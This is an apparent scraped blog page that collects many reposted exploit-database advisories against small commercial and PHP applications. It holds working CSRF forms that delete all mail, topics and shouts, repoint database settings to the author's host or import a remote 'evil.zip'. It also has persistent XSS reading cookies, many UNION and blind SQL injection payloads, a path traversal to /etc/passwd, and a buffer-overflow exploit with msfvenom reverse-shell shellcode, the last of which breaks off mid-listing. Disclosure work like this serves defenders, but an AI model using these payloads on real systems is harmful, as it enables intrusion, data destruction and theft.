Dear List,
Greetings from vishnu (@dH4wk)
1. Vulnerable Product
- Advanced Encryption Package
- Company http://www.aeppro.com/
2. Vulnerability Information
(A) Buffer OverFlow
Impact: Attacker gains administrative access
Remotely Exploitable: No
Locally Exploitable: Yes
3. Vulnerability Description
A 1006 byte causes the overflow. It is due to the inefficient/improper
handling of exception. This is an SEH based stack overflow and is
exploitable..
4. Reproduction:
It can be reproduced by pasting 1006 "A"s or any characters in the
field where the key file is asked during encryption of "*TEXT TO ENCRYPT *"
tab..
*Windbg Output*
==============================================================
(a34.a38): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Module load completed but symbols could not be loaded for
image00000000`00400000
image00000000_00400000+0x19c0:
004019c0 f00fc108 lock xadd dword ptr [eax],ecx
ds:002b:4141413d=????????
(a34.a38): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
41414141 ??
==============================================================
Regards,
Vishnu Raju.
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863107338
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-RFI.txt
Vendor:
=============================
www.anelectron.com/downloads/
Product:
================================
Advanced Electron Forum v1.0.9 (AEF)
Exploit patched current version.
Vulnerability Type:
============================
Remote File Inclusion / CSRF
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
In Admin control panel there is option to Import Skins and one choice is
using a web URL.
From AEF:
"Specify the URL of the theme on the net. The theme file must be a
compressed archive (zip, tgz, tbz2, tar)."
However there is no CSRF token or check made that this is a valid request
made by the currently logged in user, resulting
in arbitrary remote file imports from an attacker if the user visits or
clicks an malicious link. Victims will then be left
open to arbitrary malicious file downloads from anywhere on the net which
may be used as a platform for further attacks...
Exploit code(s):
===============
<form id="EL-DOWNLOADO" action="
http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=skin&seadact=import"
method="post">
<input type="hidden" name="folderpath" value="../" />
<input type="hidden" name="importtype" value="2" />
<input type="hidden" name="weburl" value="
http://hyp3rlinx.altervista.org/evil.zip" />
<input type="hidden" name="filepath" value="../" />
<input type="hidden" name="uploadtheme" value="" />
<input type="hidden" name="importskin" value="Import" />
<script>document.getElementById('EL-DOWNLOADO').submit()</script>
</form>
Disclosure Timeline:
======================================
Vendor Notification: NA
January 17, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Description:
==================================================================
Request Method(s): [+] POST
Vulnerable Product: [+] Advanced Electron Forum v1.0.9 (AEF)
==================================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-XSS.txt
Vendor:
=============================
www.anelectron.com/downloads/
Product:
====================================
Advanced Electron Forum v1.0.9 (AEF)
Exploit patched current version.
Vulnerability Type:
===================
Persistent XSS
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
In Admin panel under Edit Boards / General Stuff / General Options
There is an option to sepcify a redirect URL for the forum.
See --> Redirect Forum:
Enter a URL to which this forum will be redirected to.
The redirect input field is vulnerable to a persistent XSS that will be
stored in the MySQL database
and execute attacker supplied client side code each time a victim visits
the following URLs.
http://localhost/AEF(1.0.9)_Install/index.php?
http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=forums&seadact=editforum&editforum=1
Exploit code(s):
===============
Persistent XSS
<form id="XSS-DE-PERSISTO" action="
http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=forums&seadact=editforum&editforum=1"
method="post">
<input type="hidden" name="editmother" value="c1" />
<input type="hidden" name="forder" value="1" />
<input type="hidden" name="fstatus" value="1" />
<input type="hidden" name="fredirect" value='"/><script>alert("XSS
hyp3rlinx \n\n" + document.cookie)</script>' />
<input type="hidden" name="fimage" value="" />
<input type="hidden" name="fname" value="Generals" />
<input type="hidden" name="fdesc" value="hyp3rlinx" />
<input type="hidden" name="ftheme" value="0" />
<input type="hidden" name="frulestitle" value="MAYHEM" />
<input type="hidden" name="frules" value="0" />
<input type="hidden" name="rss" value="10" />
<input type="hidden" name="rss_topic" value="0" />
<input type="hidden" name="member[-1]" value="on" />
<input type="hidden" name="member[0]" value="on" />
<input type="hidden" name="member[3]" value="on" />
<input type="hidden" name="inc_mem_posts" value="on" />
<input type="hidden" name="allow_poll" value="on" />
<input type="hidden" name="allow_html" value="on" />
<input type="hidden" name="mod_posts" value="on" />
<input type="hidden" name="editboard" value="Edit+Forum" />
<script>document.getElementById('XSS-DE-PERSISTO').submit()</script>
</form>
Some other misc XSS(s) under 'Signature' area.
http://localhost/AEF(1.0.9)_Install/index.php?act=usercp&ucpact=signature
on Anchor link setting
http://"onMouseMove="alert(0)
AND
http://localhost/AEF(1.0.9)_Install/index.php?act=usercp&ucpact=writepm
email link:
mailto:"onMouseMove="alert(1)
Disclosure Timeline:
=====================================
Vendor Notification: NA
January 17, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
Description:
=================================================================
Request Method(s): [+] POST
Vulnerable Product: [+] AEF v1.0.9 (exploit patched version)
Vulnerable Parameter(s): [+] 'fredirect'
=================================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-CSRF.txt
Vendor:
=============================
www.anelectron.com/downloads/
Product:
====================================
Advanced Electron Forum v1.0.9 (AEF)
Exploit patched current version.
Vulnerability Type:
===================
CSRF
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
In Admin panel no CSRF protections exist in multiple areas allowing remote
attackers to make HTTP request on behalf of the victim if they
currently have a valid session (logged in) and visit or click an infected
link, resulting in some of the following destructions.
0x01: Change current database settings
0x02: Delete all Inbox / Sent Emails
0x03: Delete all 'shouts'
0x04: Delete all Topics
by the way, edit profile, avatar and more all seem vulnerable as well..
Exploit code(s):
===============
CSRF 0x01:
change mysql db settings
note: however you will need to know or guess the database name.
<form id="DOOM" accept-charset="ISO-8859-1" action="
http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=conpan&seadact=mysqlset"
method="post" name="mysqlsetform">
<input type="hidden" name="server" value="hyp3rlinx.altervista.org" />
<input type="hidden" name="user" value="hyp3rlinx" />
<input type="hidden" name="password" value="DESTROYED" />
<input type="hidden" name="database" value="AEF" />
<input type="hidden" name="dbprefix" value="aef_" />
<script>document.getElementById('DOOM').submit()</script>
</form>
CSRF 0x02:
Delete all Inbox / Sent emails...
<iframe name="demonz" style="display:none" name="hidden-form"></iframe>
<form id="DESTRUCT" target="demonz" action="
http://localhost/AEF(1.0.9)_Install/index.php?act=usercp&ucpact=sentitems"
method="post">
<input type="hidden" id="sent" name="list[]" />
<input type="hidden" name="deleteselsent" value="Delete+Selected" />
</form>
<form id="DOOM" target="demonz" action="
http://localhost/AEF(1.0.9)_Install/index.php?act=usercp&ucpact=inbox"
method="post">
<input type="hidden" id="inbox" name="list[]" />
<input type="hidden" name="deleteselinbox" value="Delete+Selected" />
</form>
<script>
//Sent Email IDs seem to be stored using even numbers 2,4,6 etc...
//Inbox Email IDs seem to use odd numbers
var c=-1
var uwillsuffer;
var amttodelete=10000
var inbox=document.getElementById("inbox")
var outbox=document.getElementById("sent")
function RUIN_EVERYTHING(){
c++
//Inbox IDs are even numbered Sent are odd.
if(c % 2 == 0){
arguments[3].value=c
document.getElementById(arguments[1]).submit()
}else{
arguments[2].value=c
document.getElementById(arguments[0]).submit()
}
if(c>=amttodelete){
clearInterval(uwillsuffer)
alert("Done!")
}
}
uwillsuffer = setInterval(RUIN_EVERYTHING, 1000, "DOOM", "DESTRUCT", inbox,
outbox)
</script>
CSRF 0x03:
Delete all 'Shouts'
<form accept-charset="ISO-8859-1" id="SPECTOR_OF_HATE" action="
http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=conpan&seadact=shoutboxset"
method="post">
<input type="hidden" name="shouts" value="10" />
<input type="hidden" name="shoutboxtime" value="1440" />
<input type="hidden" name="shoutbox_emot" value="on" />
<input type="hidden" name="shoutbox_nbbc" value="on" />
<input type="hidden" name="truncatetable" value="on" />
<input type="hidden" name="delallshouts" value="Delete" />
<script>document.getElementById('SPECTOR_OF_HATE').submit()</script>
</form>
CSRF 0x04:
Delete all 'Topics' via simple GET request, this will delete topics 1 thru
7...
http://localhost/AEF(1.0.9)_Install/index.php?act=deletetopic&topid=7,6,5,4,3,2,1
Disclosure Timeline:
=======================================
Vendor Notification: NA
January 17, 2016 : Public Disclosure
Exploitation Technique:
======================
Remote
Severity Level:
================
High
Description:
===================================================================
Request Method(s): [+] POST / GET
Vulnerable Product: [+] AEF v1.0.9 (exploit patched version)
===================================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
Exploit Title : Advanced Desktop Locker [ Locker Bypass ]
# Date: 8 - 1 - 2017
# Software Link: http://www.encrypt4all.com/products/advanced-desktop-locker-information.php
# Sofrware Version : 6.0.0
# Exploit Author: Squnity | Sir.matrix
# Contact: secfathy@squnity.com
# Website: https://www.squnity.com
# Category: windows
1. Description
This Application Developed To Lock Desktop Control When User Download Files
Or Anywhere
I Can Kill TASK TO Bypass This Application
2. Proof of Concept
- Lock Your Desktop With ADL
- Click on Ctrl + R [ Run Shortcut ]
- Write CMD & Write taskmgr
- When Task Manager Open , Select ADL Prossess And Click Delete To Kill
- Exploited
POC Video :
https://www.youtube.com/watch?v=UXjHwzz2sEo&feature=youtu.be
# Exploit Title: SQL injection in Advanced comment system v1.0
# Date: 29-10-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.plohni.com
# Software Link:
http://www.plohni.com/wb/content/php/download/Advanced_comment_system_1-0.zip,
https://web.archive.org/web/20120214173003/http://www.plohni.com/wb/content/php/download/Advanced_comment_system_1-0.zip
# Version: Advanced comment system v1.0
# Tested on: All
# CVE : CVE-2018-18619
# Category: webapps
1. Description
PHP page internal/advanced_comment_system/admin.php in Advanced Comment
System 1.0 is prone to an SQL injection vulnerability because it fails to
sufficiently sanitize user-supplied data before using it in an SQL query,
allowing remote attackers to execute the sqli attack via a URL in the
"page" parameter.
The product is discontinued.
2. Proof of Concept
http://x.x.x.x/internal/advanced_comment_system/admin.php?pw=admin&page=/internal/index.php%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x71717a6b71,0x67424663534f77556d44746a59686f78427354754268636b5466486249616b724d716e4869634758,0x7171626a71),NULL--%20SkrU&del=2
3. Solution:
The product is discontinued.
# Exploit Title: Advanced Comment System 1.0 - 'ACS_path' Path Traversal
# Date: Fri, 11 Dec 2020
# Exploit Author: Francisco Javier Santiago Vázquez aka "n0ipr0cs"
# Vendor Homepage: Advanced Comment System - ACS
# Version: v1.0
# CVE: CVE-2020-35598
http://localhost/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
# # # # #
# Exploit Title: Advanced Bus Booking Script v2.04 - SQL Injection
# Google Dork: N/A
# Date: 06.03.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software : http://www.phpscriptsmall.com/product/advanced-bus-booking-script/
# Demo: http://travelbookingscript.com/demo/newbusbooking/
# Version: 2.04
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/available_seat.php?hid_Busid=[SQL]
# http://localhost/[PATH]/seatcheck.php?busid=[SQL]
# http://localhost/[PATH]/seatcheck.php?seat=[SQL]
# http://localhost/[PATH]/seatcheck.php?seat=1&busid=1&dat=[SQL]
# # # # #
# # # # #
# Exploit Title: Advance Online Learning Management Script 3.1 - SQL Injection
# Dork: N/A
# Date: 08.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/online-learning-management-script/
# Demo: http://thavasu.com/demo/online_education/
# Version: 3.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/courselist.php?subcatid=[SQL]
#
# -9'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39))--+-
#
# http://server/courselist.php?subcatid=-9'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39))--+-
#
# Parameter: subcatid (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: subcatid=9' AND 7659=7659 AND 'Akrr'='Akrr
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: subcatid=9' AND SLEEP(5) AND 'DoFl'='DoFl
#
# 2)
# http://localhost/[PATH]/courselist.php?popcourseid=[SQL]
#
# 1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39))--+-
#
# http://server/courselist.php?popcourseid=1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39))--+-
#
# Parameter: popcourseid (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: popcourseid=1' AND 9182=9182 AND 'vWmu'='vWmu
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: popcourseid=1' AND SLEEP(5) AND 'THTz'='THTz
#
# # # # #
[x]========================================================================================================================================[x]
| Title : Advance MLM Script SQL Vulnerabilities
| Software : Advance MLM Script
| Vendor : http://www.i-netsolution.com/
| Demo : http://www.i-netsolution.com/item/advance-mlm-script/live_demo/236431
| Google Dork : news_detail.php?newid= © MLM SCRIPT
| Date : 06 October 2016
| Author : OoN_Boy
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Technology : PHP
| Database : MySQL
| Price : $ 199
| Description : MLM business upward day by day, Open Source MLM Script plays an important role for successful multilevel marketing business.
Our advanced featured PHP MLM Script enables MLM companies to manage and run their express selling business more effectively towards a successful way.
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Exploit : http://localhost/mlm/news_detail.php?newid=%Inject_Here%26
| Aadmin Page : http://localhost/[path]/admin/index.php
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Proof of concept : sqlmap -u "http://localhost/mlm/news_detail.php?newid=26" --invalid-string
[x]========================================================================================================================================[x]
---
Parameter: newid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newid=26' AND 4440=4440 AND 'AJmz'='AJmz
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: newid=26' OR SLEEP(5) AND 'FokP'='FokP
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: newid=jMCtRq' UNION ALL SELECT NULL,CONCAT(0x71787a7a71,0x48755652787877617966627661486164744748424b6155564f514370537747504c6e736876665150,0x7178787171),NULL,NULL,NULL,NULL-- Afye
---
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Greetz : antisecurity.org batamhacker.or.id
| Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
| k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Hi All long time no see ^_^
[x]========================================================================================================================================[x]
# Exploit Title: Advance Loan Management System - 'id' SQL Injection
# Date: 2018-01-31
# Exploit Author: 8bitsec
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/advance-loan-management-system-with-savings-system-and-sms-notification/21283070
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.13.3]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2018-01-31
Product & Service Introduction:
===============================
LMS – Make your Bank Loan Management easy LMS is a Modern and Responsive Loan management system.
Technical Details & Description:
================================
SQL injection on [id] parameter.
Proof of Concept (PoC):
=======================
SQLi:
https://localhost/[path]/view_pmt.php?id=9' AND 7768=7768 AND 'Vgmm'='Vgmm
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=9' AND 7768=7768 AND 'Vgmm'='Vgmm
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: id=9' AND EXTRACTVALUE(1999,CONCAT(0x5c,0x7162707071,(SELECT (ELT(1999=1999,1))),0x716b6a7171)) AND 'dJCx'='dJCx
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: id=-1179' UNION ALL SELECT NULL,NULL,CONCAT(0x7162707071,0x4c714c75756a7843774f4479627566597448726c6f51547a4d7a5766686345446b43587965626470,0x716b6a7171),NULL,NULL,NULL,NULL,NULL,NULL-- FLWW
==================
8bitsec - [https://twitter.com/_8bitsec]
# Exploit Title: Advance Gift Shop Pro Script 2.0.3 - SQL Injection
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 21, 2019
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link : https://www.phpscriptsmall.com/product/gifts-shop/
# Tested Version: 2.0.3
# Tested on: Kali linux, Windows 8.1
# PoC:
# http://localhost/[PATH]/?category=&s=[SQL]&search_posttype=product
# http://localhost/[PATH]/?category=&s=1%20and%20extractvalue(rand(),concat(0x7e,version()))&search_posttype=product
# # # # #
# Exploit Title: Advance B2B Script 2.1.3 - SQL Injection
# Dork: N/A
# Date: 08.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/advance-b2b-script/
# Demo: http://198.38.86.159/~advancedb2b/
# Version: 2.1.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/tradeshow-list-detail.php?show_id=[SQL]
#
# -33'++UNION+ALL+SELECT+1,(/*!11111Select*/+export_set(5,@:=0,(/*!11111select*/+count(*)/*!11111from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!11111table_name*/,0x3c6c693e,2),/*!11111column_name*/,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67--+-
#
# http:/server/tradeshow-list-detail.php?show_id=-33'++UNION+ALL+SELECT+1,(/*!11111Select*/+export_set(5,@:=0,(/*!11111select*/+count(*)/*!11111from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!11111table_name*/,0x3c6c693e,2),/*!11111column_name*/,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67--+-
#
# Parameter: show_id (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: show_id=33' AND 2728=2728 AND 'YmuO'='YmuO
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 67 columns
# Payload: show_id=-3015' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171706b71,0x584943414f617573724e456a6a5369584f53494448646a56596b4a54736670476c424d6b6a4e556b,0x7170707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- pUZl
#
# 2)
# http://localhost/[PATH]/view-product.php?pid=[SQL]
#
# -1555'++UNION+ALL+SELECT+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+-
#
# http://server/view-product.php?pid=-1555'++UNION+ALL+SELECT+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+-
#
# Parameter: pid (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: pid=1555' AND 2914=2914 AND 'zyef'='zyef
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: pid=1555' AND SLEEP(5) AND 'DubS'='DubS
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 33 columns
# Payload: pid=1555' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176706b71,0x4776706c6c514f494a596a436179624947684a6c655163434156506b6d454463737076706d52506d,0x71766b7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hHVm
#
# # # # #
# # # # #
# Exploit Title: Adult Tube Video Script - SQL Injection
# Google Dork: N/A
# Date: 25.03.2017
# Vendor Homepage: http://www.boysofts.com/
# Software: http://www3.boysofts.com/xxx/freeadultvideotubescript.zip
# Demo: http://www.boysofts.com/2013/12/free-adult-tube-video-script.html
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/single-video.php?video_id=[SQL]
# http://localhost/[PATH]/search.php?page=[SQL]
# single-video.php?video_id=25404991'+And(SelecT+1+FroM+(SelecT+CoUnT(*),ConCAT((SelecT(SelecT+ConCAT(CAST(DatabasE()+As+ChAr),0x7e,0x496873616e2053656e63616e))+FroM+information_schema.tables+WhErE+table_schema=DatabasE()+LImIt+0,1),FLooR(RanD(0)*2))x+FroM+information_schema.tables+GrOuP+By+x)a)++and+'userip'='userip
# # # # #
# # # # #
# Exploit Title: Adult Script Pro 2.2.4 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.adultscriptpro.com/
# Software Link: http://www.adultscriptpro.com/order.html
# Demo: http://www.adultscriptpro.com/demo.html
# Version: 2.2.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15959
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/download/[SQL]
#
# VerAyari+aNd(SELeCT+1+FroM(SeLECT+CoUNT(*),CoNCat((SeLECT+(SELECT+CoNCat(CaST(VERSIoN()+aS+ChaR),0x7e,0x496873616E53656e63616e))+FroM+INFoRMaTIoN_SChEMa.TaBLES+LIMIT+0,1),FLooR(RaNd(0)*2))x+FroM+INFoRMaTIoN_SChEMa.TaBLES+GRoUP+BY+x)a)
#
# Parameter: #1* (URI)
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: http://localhost/[PATH]/download/Verayari AND (SELECT 4247 FROM(SELECT COUNT(*),CONCAT(0x716a717a71,(SELECT (ELT(4247=4247,1))),0x717a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
#
# Etc..
# # # # #
# Exploit Title: ADULT FILTER 1.0 - Denial of Service (PoC)
# Date: 2018-10-28
# Exploit Author: Beren Kuday GÖRÜN
# Vendor Homepage: http://www.armcode.com/adult-filter/
# Software Link: http://www.armcode.com/downloads/adult-filter.exe
# Version: 1.0 (Build 2007-Mar-12)
# Tested on OS: Windows XP Professional sp3 (ENG)
# Steps to Reproduce: Run the python3 exploit script, it will create a new
# file with the name "boom_for_Adult_Filter.txt". Copy the content of the
# new file "boom_for_Adult_Filter.txt". Now start the program. When you
# open the program, select 'Options >> Black Domain List ...' from the
# menu item. In the window that opens, enter the text in the file you
# created with python3 script the 'Add the domain list' section.
# Press the 'Add' button and then press the 'OK' button.
# And see a crash!
buffer = "A" * 4500
try:
file = open("boom_for_Adult_Filter.txt","w")
file.write(buffer)
file.close()
print("[*] Ready for Denial of Service")
except:
print("[*] Error: Failed to create file")
# Exploit Title: Adult Filter 1.0 - Buffer Overflow (SEH)
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Discovery Date: 2018-10-25
# Homepage: http://www.armcode.com/adult-filter/
# Software Link: http://www.armcode.com/downloads/adult-filter.exe
# Version: 1.0
# Tested on: Windows XP Professional SP3 (ENG)
# Steps to Reproduce: Run the python exploit script, it will create a new file
# with the name "greetz-phr-key-onkan-cwd.txt".
# Start Adult Filter 1.0 click "Options" click "Black Domain List" click "Import"
# Select "greetz-cwd-onkan-key-phr.txt" and Click after select "name.txt" "OK" connect victim machine on port 1907
#!/usr/bin/python -w
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.23 LPORT=1907 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x1a"
# Payload size: 351 bytes
filename="greetz-cwd-onkan-key-phr.txt"
shellcode=("\xba\x80\xfe\xaf\x95\xda\xcb\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
"\x52\x83\xee\xfc\x31\x56\x0e\x03\xd6\xf0\x4d\x60\x2a\xe4\x10"
"\x8b\xd2\xf5\x74\x05\x37\xc4\xb4\x71\x3c\x77\x05\xf1\x10\x74"
"\xee\x57\x80\x0f\x82\x7f\xa7\xb8\x29\xa6\x86\x39\x01\x9a\x89"
"\xb9\x58\xcf\x69\x83\x92\x02\x68\xc4\xcf\xef\x38\x9d\x84\x42"
"\xac\xaa\xd1\x5e\x47\xe0\xf4\xe6\xb4\xb1\xf7\xc7\x6b\xc9\xa1"
"\xc7\x8a\x1e\xda\x41\x94\x43\xe7\x18\x2f\xb7\x93\x9a\xf9\x89"
"\x5c\x30\xc4\x25\xaf\x48\x01\x81\x50\x3f\x7b\xf1\xed\x38\xb8"
"\x8b\x29\xcc\x5a\x2b\xb9\x76\x86\xcd\x6e\xe0\x4d\xc1\xdb\x66"
"\x09\xc6\xda\xab\x22\xf2\x57\x4a\xe4\x72\x23\x69\x20\xde\xf7"
"\x10\x71\xba\x56\x2c\x61\x65\x06\x88\xea\x88\x53\xa1\xb1\xc4"
"\x90\x88\x49\x15\xbf\x9b\x3a\x27\x60\x30\xd4\x0b\xe9\x9e\x23"
